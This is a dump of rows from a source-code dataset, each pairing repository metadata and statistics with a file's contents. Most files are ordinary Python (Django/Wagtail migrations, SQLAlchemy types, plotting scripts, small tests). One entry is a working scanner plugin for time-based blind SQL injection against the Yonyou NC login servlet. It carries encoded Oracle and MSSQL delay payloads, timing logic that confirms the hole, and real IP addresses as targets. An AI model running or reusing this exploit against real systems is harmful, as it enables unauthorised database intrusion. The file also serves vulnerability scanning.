4cd16d12961de1ebd54ce8ecce9a9f41a432ec9c | 213 | py | Python | neuro_logging/testing_utils.py | neuro-inc/neuro-logging | e3173a40d0e2559f113f1420ed8a3fd4a0e76dde | [
"Apache-2.0"
] | null | null | null | neuro_logging/testing_utils.py | neuro-inc/neuro-logging | e3173a40d0e2559f113f1420ed8a3fd4a0e76dde | [
"Apache-2.0"
] | 50 | 2021-08-20T00:10:05.000Z | 2022-02-21T16:44:46.000Z | neuro_logging/testing_utils.py | neuro-inc/neuro-logging | e3173a40d0e2559f113f1420ed8a3fd4a0e76dde | [
"Apache-2.0"
] | null | null | null | # shim file for testing purpose,
# _find_caller_version() should be called from a package
from neuro_logging.trace import _find_caller_version
def _get_test_version() -> str:
return _find_caller_version(1)
| 23.666667 | 56 | 0.793427 | 32 | 213 | 4.875 | 0.75 | 0.192308 | 0.326923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005495 | 0.14554 | 213 | 8 | 57 | 26.625 | 0.851648 | 0.399061 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
4cf415afee101a6a4d308d53426f8649f55baad0 | 11,500 | py | Python | bc/inlineindex/migrations/0001_initial.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | 1 | 2021-02-27T07:27:17.000Z | 2021-02-27T07:27:17.000Z | bc/inlineindex/migrations/0001_initial.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | null | null | null | bc/inlineindex/migrations/0001_initial.py | Buckinghamshire-Digital-Service/buckinghamshire-council | bbbdb52b515bcdfc79a2bd9198dfa4828405370e | [
"BSD-3-Clause"
] | 1 | 2021-06-09T15:56:54.000Z | 2021-06-09T15:56:54.000Z | # Generated by Django 2.2.9 on 2019-12-19 22:10
import django.db.models.deletion
from django.db import migrations, models
import wagtail.core.blocks
import wagtail.core.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
("wagtailcore", "0041_group_collection_permissions_verbose_name_plural"),
]
operations = [
migrations.CreateModel(
name="InlineIndex",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"subtitle",
models.CharField(
default="Introduction",
help_text="Title that appears on the index. (e.g. Introduction)",
max_length=255,
),
),
(
"body",
wagtail.core.fields.StreamField(
[
(
"heading",
wagtail.core.blocks.CharBlock(
classname="full title",
icon="title",
template="patterns/molecules/streamfield/blocks/heading_block.html",
),
),
(
"paragraph",
wagtail.core.blocks.RichTextBlock(
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
]
),
),
(
"local_area_links",
wagtail.core.blocks.StructBlock(
[
(
"introduction",
wagtail.core.blocks.RichTextBlock(
default="<p>Select your local area for information:</p>",
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
],
),
),
(
"aylesbury_vale_url",
wagtail.core.blocks.URLBlock(
label="Aylesbury Vale URL",
required=False,
),
),
(
"chiltern_url",
wagtail.core.blocks.URLBlock(
label="Chiltern URL", required=False
),
),
(
"south_bucks_url",
wagtail.core.blocks.URLBlock(
label="South Bucks URL", required=False
),
),
(
"wycombe_url",
wagtail.core.blocks.URLBlock(
label="Wycombe URL", required=False
),
),
(
"postscript",
wagtail.core.blocks.RichTextBlock(
default='<p>Or <a href="https://www.gov.uk/find-local-council">click here</a> to find your area based on your postcode.</p>',
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
],
required=False,
),
),
]
),
),
]
),
),
],
options={"abstract": False,},
bases=("wagtailcore.page",),
),
migrations.CreateModel(
name="InlineIndexChild",
fields=[
(
"page_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="wagtailcore.Page",
),
),
(
"body",
wagtail.core.fields.StreamField(
[
(
"heading",
wagtail.core.blocks.CharBlock(
classname="full title",
icon="title",
template="patterns/molecules/streamfield/blocks/heading_block.html",
),
),
(
"paragraph",
wagtail.core.blocks.RichTextBlock(
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
]
),
),
(
"local_area_links",
wagtail.core.blocks.StructBlock(
[
(
"introduction",
wagtail.core.blocks.RichTextBlock(
default="<p>Select your local area for information:</p>",
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
],
),
),
(
"aylesbury_vale_url",
wagtail.core.blocks.URLBlock(
label="Aylesbury Vale URL",
required=False,
),
),
(
"chiltern_url",
wagtail.core.blocks.URLBlock(
label="Chiltern URL", required=False
),
),
(
"south_bucks_url",
wagtail.core.blocks.URLBlock(
label="South Bucks URL", required=False
),
),
(
"wycombe_url",
wagtail.core.blocks.URLBlock(
label="Wycombe URL", required=False
),
),
(
"postscript",
wagtail.core.blocks.RichTextBlock(
default='<p>Or <a href="https://www.gov.uk/find-local-council">click here</a> to find your area based on your postcode.</p>',
features=[
"bold",
"italic",
"ol",
"ul",
"link",
"document-link",
],
required=False,
),
),
]
),
),
]
),
),
],
options={"abstract": False,},
bases=("wagtailcore.page",),
),
]
| 47.520661 | 173 | 0.220087 | 442 | 11,500 | 5.644796 | 0.280543 | 0.096994 | 0.129459 | 0.064128 | 0.821643 | 0.821643 | 0.821643 | 0.821643 | 0.821643 | 0.821643 | 0 | 0.00679 | 0.718261 | 11,500 | 241 | 174 | 47.717842 | 0.763272 | 0.003913 | 0 | 0.781116 | 1 | 0.008584 | 0.10888 | 0.014407 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017167 | 0 | 0.034335 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
4cfcd64060161d716d88575c8a0ec4caae4d9d39 | 112 | py | Python | tests/test_utils.py | elstevi/libbhyve | 9d746073b80fc21d58d7931a21a891836d0748a6 | [
"BSD-2-Clause"
] | 1 | 2020-06-18T17:58:01.000Z | 2020-06-18T17:58:01.000Z | tests/test_utils.py | elstevi/libbhyve | 9d746073b80fc21d58d7931a21a891836d0748a6 | [
"BSD-2-Clause"
] | null | null | null | tests/test_utils.py | elstevi/libbhyve | 9d746073b80fc21d58d7931a21a891836d0748a6 | [
"BSD-2-Clause"
] | null | null | null | import pytest
from libbhyve.utils import log
def test_log():
assert log('crit', 'world') == "[crit] world"
| 18.666667 | 49 | 0.678571 | 16 | 112 | 4.6875 | 0.6875 | 0.24 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169643 | 112 | 5 | 50 | 22.4 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0.1875 | 0 | 0 | 0 | 0 | 0 | 0.25 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e24c8a9efc3697032166cdea2148f93cda8a5b57 | 77 | py | Python | pclpy/view/__init__.py | toinsson/pclpy | e44d261c4996bc5fd4080bf813542ccdffbca601 | [
"MIT"
] | 293 | 2018-05-21T21:50:11.000Z | 2022-03-30T02:43:08.000Z | pclpy/view/__init__.py | toinsson/pclpy | e44d261c4996bc5fd4080bf813542ccdffbca601 | [
"MIT"
] | 97 | 2018-04-23T20:45:20.000Z | 2022-03-28T09:00:25.000Z | pclpy/view/__init__.py | toinsson/pclpy | e44d261c4996bc5fd4080bf813542ccdffbca601 | [
"MIT"
] | 56 | 2018-05-16T08:59:09.000Z | 2022-02-24T02:21:11.000Z |
from pclpy.view.cloudcompare import cloudcompare
from pclpy.view import vtk | 19.25 | 48 | 0.844156 | 11 | 77 | 5.909091 | 0.545455 | 0.276923 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116883 | 77 | 4 | 49 | 19.25 | 0.955882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e27801e662da382246d346122a3a292d5cf33927 | 69 | py | Python | VTree/vtree/__init__.py | MarcoMuellner/VTree | c4bd509daeb80652075df1937b5861fa3e281dff | [
"MIT"
] | null | null | null | VTree/vtree/__init__.py | MarcoMuellner/VTree | c4bd509daeb80652075df1937b5861fa3e281dff | [
"MIT"
] | null | null | null | VTree/vtree/__init__.py | MarcoMuellner/VTree | c4bd509daeb80652075df1937b5861fa3e281dff | [
"MIT"
] | null | null | null | from VTree.vtree.VTree import VTree
from VTree.vtree.Node import Node | 34.5 | 35 | 0.84058 | 12 | 69 | 4.833333 | 0.333333 | 0.517241 | 0.482759 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101449 | 69 | 2 | 36 | 34.5 | 0.935484 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e298bb8bb616ba4db97bb5f236bb14ddb4a5171e | 1,276 | py | Python | sqlhandler/custom/field.py | matthewgdv/sqlhandler | b82fd159195f6bb63175bb8a8d81fc421e7d5835 | [
"MIT"
] | null | null | null | sqlhandler/custom/field.py | matthewgdv/sqlhandler | b82fd159195f6bb63175bb8a8d81fc421e7d5835 | [
"MIT"
] | null | null | null | sqlhandler/custom/field.py | matthewgdv/sqlhandler | b82fd159195f6bb63175bb8a8d81fc421e7d5835 | [
"MIT"
] | null | null | null | from __future__ import annotations
from sqlalchemy import types
from subtypes import DateTime, Date
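# Custom SQLAlchemy type decorators: BitLiteral renders literal parameters as integer strings,
# while SubtypesDateTime/SubtypesDate convert bound and literal parameters to ISO strings and
# parse result values back via DateTime.infer / Date.infer.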
class BitLiteral(types.TypeDecorator):
impl = types.DateTime
def process_literal_param(self, value, dialect):
return str(int(value))
class SubtypesDateTime(types.TypeDecorator):
impl = types.DateTime
string = types.String()
def process_bind_param(self, value, dialect):
return None if value is None else DateTime.infer(value).to_isoformat()
def process_literal_param(self, value, dialect):
return None if value is None else self.string.literal_processor(dialect)(DateTime.infer(value).to_isoformat())
def process_result_value(self, value, dialect):
return None if value is None else DateTime.infer(value)
class SubtypesDate(types.TypeDecorator):
impl = types.Date
string = types.String()
def process_bind_param(self, value, dialect):
return None if value is None else Date.infer(value).to_isoformat()
def process_literal_param(self, value, dialect):
return None if value is None else self.string.literal_processor(dialect)(Date.infer(value).to_isoformat())
def process_result_value(self, value, dialect):
return None if value is None else Date.infer(value)
| 31.121951 | 118 | 0.734326 | 171 | 1,276 | 5.339181 | 0.210526 | 0.07667 | 0.122673 | 0.168675 | 0.806134 | 0.729463 | 0.729463 | 0.71632 | 0.668127 | 0.668127 | 0 | 0 | 0.181034 | 1,276 | 40 | 119 | 31.9 | 0.873684 | 0 | 0 | 0.44 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.28 | false | 0 | 0.12 | 0.28 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 8 |
2c61d4849e47a71765b84f72bc8e34a5430fe083 | 10,004 | py | Python | graphical_analysis/query_scenario_additional_operators_analysis.py | sjuenger/WikiMETA | 13ed293b4bda8ff0fc10b532907ca35c24a12616 | [
"MIT"
] | null | null | null | graphical_analysis/query_scenario_additional_operators_analysis.py | sjuenger/WikiMETA | 13ed293b4bda8ff0fc10b532907ca35c24a12616 | [
"MIT"
] | null | null | null | graphical_analysis/query_scenario_additional_operators_analysis.py | sjuenger/WikiMETA | 13ed293b4bda8ff0fc10b532907ca35c24a12616 | [
"MIT"
] | null | null | null | import os
import json
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
# plot only the NON-redundant data
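# Builds a heatmap (operator name x timeframe) of the share of each property-path operator found
# in OPTIONAL-scenario queries, including a "total" column, and saves it as a PDF.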
def plot_additional_second_level_operator_information_about_scenarios_per_timeframe_for_OPTIONAL(timeframes,
metadata,
scenario):
if metadata not in ["reference_metadata", "rank_metadata", "qualifier_metadata"]:
raise Exception
if scenario not in ["optional"]:
raise Exception
csv_ready_scenario_dict = {}
csv_ready_scenario_dict["timeframe"] = []
csv_ready_scenario_dict["datatype"] = []
csv_ready_scenario_dict["base scenario"] = []
csv_ready_scenario_dict["operator name"] = []
csv_ready_scenario_dict["operator count"] = []
csv_ready_scenario_dict["operator percentage"] = []
csv_ready_scenario_dict["total operators"] = []
for timeframe in timeframes:
# get the path to the location information of the timeframe scenario data per
# datatype
information_path = "data/" + timeframe[:21] + "/" + timeframe[22:] + \
"/" + metadata + \
"/scenarios/non_redundant/" + scenario + "_statistical_information.json"
if os.path.exists(information_path):
with open(information_path, "r") as stat_info_scenarios_data:
stat_info_scenarios_dict = json.load(stat_info_scenarios_data)
for operator in stat_info_scenarios_dict["in_found_prop_path_found_operators_overall"]:
csv_ready_scenario_dict["operator name"].append(operator)
csv_ready_scenario_dict["operator count"]. \
append(stat_info_scenarios_dict["in_found_prop_path_found_operators_overall"][operator])
total_occurrences = stat_info_scenarios_dict["in_found_prop_path_total_found_operators"]
if total_occurrences > 0:
csv_ready_scenario_dict["operator percentage"]. \
append(
int(stat_info_scenarios_dict["in_found_prop_path_found_operators_overall"][operator]) /
total_occurrences)
else:
csv_ready_scenario_dict["operator percentage"]. \
append(0)
csv_ready_scenario_dict["total operators"].append(total_occurrences)
csv_ready_scenario_dict["timeframe"]. \
append(timeframe[:21].replace("_", "-\n"))
csv_ready_scenario_dict["datatype"].append(metadata)
csv_ready_scenario_dict["base scenario"].append(scenario)
# insert the total data
overall_information_path = "data/statistical_information/query_research/" + "non_redundant" + \
"/" + metadata + "/scenarios/additional_layer/" \
+ scenario +"_statistical_information.json"
with open(overall_information_path, "r") as overall_data:
overall_dict = json.load(overall_data)
for operator in overall_dict["in_found_prop_path_found_operators_overall"]:
csv_ready_scenario_dict["operator name"].append(operator)
csv_ready_scenario_dict["operator count"]. \
append(overall_dict["in_found_prop_path_found_operators_overall"][operator])
total_occurrences = overall_dict["in_found_prop_path_total_found_operators"]
if total_occurrences > 0:
csv_ready_scenario_dict["operator percentage"]. \
append(
int(overall_dict["in_found_prop_path_found_operators_overall"][operator]) /
total_occurrences)
else:
csv_ready_scenario_dict["operator percentage"]. \
append(0)
csv_ready_scenario_dict["total operators"].append(total_occurrences)
csv_ready_scenario_dict["timeframe"]. \
append("total")
csv_ready_scenario_dict["datatype"].append(metadata)
csv_ready_scenario_dict["base scenario"].append(scenario)
# plot the data in a heatmap
tmp_dict = {}
tmp_dict["operator name"] = []
tmp_dict["timeframe"] = []
tmp_dict["operator percentage"] = []
for i in range(len(csv_ready_scenario_dict["timeframe"])):
tmp_dict["operator name"].append(csv_ready_scenario_dict["operator name"][i])
tmp_dict["timeframe"].append(csv_ready_scenario_dict["timeframe"][i])
tmp_dict["operator percentage"].append(\
csv_ready_scenario_dict["operator percentage"][i])
df = pd.DataFrame(tmp_dict)
df = pd.pivot_table(data=df,
index='operator name',
values='operator percentage',
columns='timeframe', sort=True)
mask = (df == 0)
fig, ax = plt.subplots(figsize=(9, 5)) # 16 10
tmp = sns.heatmap(df, ax=ax, annot=True, vmin = 0, vmax = 1, mask=mask, cmap="Reds",
linewidths=.5)
tmp.figure.tight_layout()
tmp.figure.subplots_adjust(left=0.15, bottom=0.3)
# set the yticks "upright" with 0, as opposed to sideways with 90
plt.yticks(rotation=0)
plt.gcf().autofmt_xdate()
save_path = "data/statistical_information/query_research/non_redundant/" \
+ metadata + "/scenarios/additional_layer/" + \
scenario + "_prop_path_operators.pdf"
tmp.get_figure().savefig(save_path)
plt.close()
# plot only the NON-redundant data
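# Same idea as above, but aggregated per datatype instead of per timeframe; the heatmap is saved
# as <scenario>_prop_path_operators_per_datatype.pdf.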
def plot_additional_second_level_operator_information_about_scenarios_per_datatype_for_OPTIONAL(timeframes,
metadata,
scenario):
if metadata not in ["reference_metadata", "rank_metadata", "qualifier_metadata"]:
raise Exception
if scenario not in ["optional"]:
raise Exception
csv_ready_scenario_dict = {}
csv_ready_scenario_dict["datatype"] = []
csv_ready_scenario_dict["base scenario"] = []
csv_ready_scenario_dict["operator name"] = []
csv_ready_scenario_dict["operator count"] = []
csv_ready_scenario_dict["operator percentage"] = []
csv_ready_scenario_dict["total operators"] = []
# insert the total data
overall_information_path = "data/statistical_information/query_research/" + "non_redundant" + \
"/" + metadata + "/scenarios/additional_layer/" \
+ scenario +"_statistical_information.json"
with open(overall_information_path, "r") as overall_data:
overall_dict = json.load(overall_data)
for datatype in overall_dict["in_found_prop_path_found_operators_per_datatype"]:
for operator in overall_dict["in_found_prop_path_found_operators_per_datatype"][datatype]:
csv_ready_scenario_dict["operator name"].append(operator)
csv_ready_scenario_dict["operator count"]. \
append(overall_dict["in_found_prop_path_found_operators_per_datatype"][datatype][operator])
total_occurrences = overall_dict["in_found_prop_path_total_found_operators"]
if total_occurrences > 0:
csv_ready_scenario_dict["operator percentage"]. \
append(
int(overall_dict["in_found_prop_path_found_operators_per_datatype"][datatype][operator]) /
total_occurrences)
else:
csv_ready_scenario_dict["operator percentage"]. \
append(0)
csv_ready_scenario_dict["total operators"].append(total_occurrences)
# e.g. reference_metadata/only_derived -> only_derived
csv_ready_scenario_dict["datatype"].append(datatype.split("/")[1].
replace("_+_", " +\n").
replace("e_", "e\n"))
csv_ready_scenario_dict["base scenario"].append(scenario)
# plot the data in a heatmap
tmp_dict = {}
tmp_dict["operator name"] = []
tmp_dict["datatype"] = []
tmp_dict["operator percentage"] = []
for i in range(len(csv_ready_scenario_dict["datatype"])):
tmp_dict["operator name"].append(csv_ready_scenario_dict["operator name"][i])
tmp_dict["datatype"].append(csv_ready_scenario_dict["datatype"][i])
tmp_dict["operator percentage"].append(\
csv_ready_scenario_dict["operator percentage"][i])
df = pd.DataFrame(tmp_dict)
df = pd.pivot_table(data=df,
index='operator name',
values='operator percentage',
columns='datatype', sort=True)
mask = (df == 0)
fig, ax = plt.subplots(figsize=(6, 6))
tmp = sns.heatmap(df, ax=ax, annot=True, vmin = 0, vmax = 1, mask=mask, cmap="Greys",
linewidths=.5)
tmp.figure.subplots_adjust()
tmp.figure.tight_layout()
tmp.figure.subplots_adjust(left=0.15, bottom=0)
# set the yticks "upright" with 0, as opposed to sideways with 90
plt.yticks(rotation=0)
plt.gcf().autofmt_xdate()
save_path = "data/statistical_information/query_research/non_redundant/" \
+ metadata + "/scenarios/additional_layer/" + \
scenario + "_prop_path_operators_per_datatype.pdf"
tmp.get_figure().savefig(save_path)
plt.close()
| 41.510373 | 115 | 0.592463 | 1,041 | 10,004 | 5.332373 | 0.132565 | 0.066294 | 0.132589 | 0.165736 | 0.883805 | 0.863268 | 0.857143 | 0.857143 | 0.85408 | 0.840389 | 0 | 0.00667 | 0.310576 | 10,004 | 240 | 116 | 41.683333 | 0.798173 | 0.043683 | 0 | 0.701863 | 0 | 0 | 0.216372 | 0.109808 | 0.012422 | 0 | 0 | 0 | 0 | 1 | 0.012422 | false | 0 | 0.031056 | 0 | 0.043478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2c668aa48dc5db25540507a87523989f031dc268 | 2,434 | py | Python | Bugscan_exploits-master/exp_list/exp-1723.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 11 | 2020-05-30T13:53:49.000Z | 2021-03-17T03:20:59.000Z | Bugscan_exploits-master/exp_list/exp-1723.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-13T03:25:18.000Z | 2020-07-21T06:24:16.000Z | Bugscan_exploits-master/exp_list/exp-1723.py | csadsl/poc_exp | e3146262e7403f19f49ee2db56338fa3f8e119c9 | [
"MIT"
] | 6 | 2020-05-30T13:53:51.000Z | 2020-12-01T21:44:26.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:小光
#refer:http://www.wooyun.org/bugs/wooyun-2015-0138680
import time
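# curl.curl2() and security_hole() are expected to be supplied by the scanning framework at
# runtime (locally via "from dummy import *" in the __main__ block below).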
def assign(service, arg):
if service == "yongyou_nc":
return True, arg
def audit(arg):
url = arg + 'nc/servlet/nc.ui.iufo.login.LoginUI'
postdatas ={
'LoginButton=%e7%99%bb%e5%bd%95(Login)&currentDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%20AND%208148%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2867%29%7C%7CCHR%2885%29%7C%7CCHR%2876%29%2C5%29%20AND%20%28%271%27%3D%271':'LoginButton=%e7%99%bb%e5%bd%95(Login)&currentDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%20AND%208148%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2872%29%7C%7CCHR%2867%29%7C%7CCHR%2885%29%7C%7CCHR%2876%29%2C1%29%20AND%20%28%271%27%3D%271',
'LoginButton=%e7%99%bb%e5%bd%95(Login)&currentDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--':'LoginButton=%e7%99%bb%e5%bd%95(Login)&currentDate=2015-09-02&dschoice=aorwpw5ufcw6&hidBack=&languagechoice=simpchn&operType=null&refrence=%e5%8f%82%e7%85%a7(Ref)&timeRef=%e5%8f%82%e7%85%a7(Ref)&UserCodeText=wxbsisqq&UserPassText=wxbsisqq&UserSeleLang=simpchn&UserUnitText=asd%27%29%3BWAITFOR%20DELAY%20%270%3A0%3A1%27--'
}
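# Time-based blind SQL injection check: each dict key/value pair is a slow (5 s) / fast (1 s)
# variant of the same payload; a large delay difference indicates the parameter is injectable.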
for postdata in postdatas:
t1 = time.time()
code1, head, res1, errcode, _ = curl.curl2(url,postdata)
t2 = time.time()
code2, head, res2, errcode, _ = curl.curl2(url,postdatas[postdata])
t3 = time.time()
if code1==200 and code2 == 200 and (2*t2 - t1 - t3 > 3):
security_hole(url + " :post Injection")
if __name__ == '__main__':
from dummy import *
audit(assign('yongyou_nc', 'http://61.135.227.114/')[1])
audit(assign('yongyou_nc', 'http://101.95.113.130/')[1]) | 76.0625 | 851 | 0.69926 | 371 | 2,434 | 4.539084 | 0.342318 | 0.019002 | 0.028504 | 0.038005 | 0.729216 | 0.700713 | 0.700713 | 0.700713 | 0.700713 | 0.700713 | 0 | 0.163858 | 0.122432 | 2,434 | 32 | 852 | 76.0625 | 0.624532 | 0.042317 | 0 | 0 | 0 | 0.181818 | 0.70222 | 0.658685 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.090909 | 0 | 0.227273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
2cacd3ac099a9a692b63bde28cfa56e0872ca82b | 25 | py | Python | python/testData/MockSdkWithBinaryModules/python_stubs/oldnumpy/core/umath.py | adehtiarov/intellij-community | 82826022ae57a7ae5e7f8fe3430f2ea4fc1a8f86 | [
"Apache-2.0"
] | 2 | 2018-12-29T09:53:39.000Z | 2018-12-29T09:53:42.000Z | python/testData/MockSdkWithBinaryModules/python_stubs/oldnumpy/core/umath.py | tnorbye/intellij-community | f01cf262fc196bf4dbb99e20cd937dee3705a7b6 | [
"Apache-2.0"
] | null | null | null | python/testData/MockSdkWithBinaryModules/python_stubs/oldnumpy/core/umath.py | tnorbye/intellij-community | f01cf262fc196bf4dbb99e20cd937dee3705a7b6 | [
"Apache-2.0"
] | null | null | null | def log():
return 1.0 | 12.5 | 14 | 0.56 | 5 | 25 | 2.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0.28 | 25 | 2 | 14 | 12.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
e2f110ca62c190bddaaabb3c870620163646540d | 1,017 | py | Python | examples/simple_book.py | kapinga/piecash | ec30cf469198cccf35f7ba968f889d360cfe1824 | [
"MIT"
] | 223 | 2015-01-12T22:02:53.000Z | 2022-03-03T22:05:42.000Z | examples/simple_book.py | kapinga/piecash | ec30cf469198cccf35f7ba968f889d360cfe1824 | [
"MIT"
] | 158 | 2015-03-16T19:57:29.000Z | 2022-01-31T23:22:57.000Z | examples/simple_book.py | kapinga/piecash | ec30cf469198cccf35f7ba968f889d360cfe1824 | [
"MIT"
] | 84 | 2015-02-06T14:17:17.000Z | 2022-03-14T02:13:50.000Z | from __future__ import print_function
from piecash import create_book
# create by default an in memory sqlite version
with create_book(echo=False) as book:
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
print("changing description...")
book.root_account.description = "hello, book"
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
print("saving...")
book.save()
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
print("changing description...")
book.root_account.description = "nevermind, book"
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
print("cancel...")
book.cancel()
print("Book is saved:", book.is_saved, end=" ")
print(" ==> book description:", book.root_account.description)
| 32.806452 | 66 | 0.672566 | 126 | 1,017 | 5.277778 | 0.246032 | 0.135338 | 0.165414 | 0.273684 | 0.754887 | 0.754887 | 0.754887 | 0.754887 | 0.754887 | 0.754887 | 0 | 0 | 0.169125 | 1,017 | 30 | 67 | 33.9 | 0.786982 | 0.044248 | 0 | 0.571429 | 0 | 0 | 0.283505 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.095238 | 0 | 0.095238 | 0.714286 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
3939092a735662ab4f640101981b68eeb5655262 | 29,111 | py | Python | locan/tests/data/test_aggregate.py | super-resolution/Locan | 94ed7759f7d7ceddee7c7feaabff80010cfedf30 | [
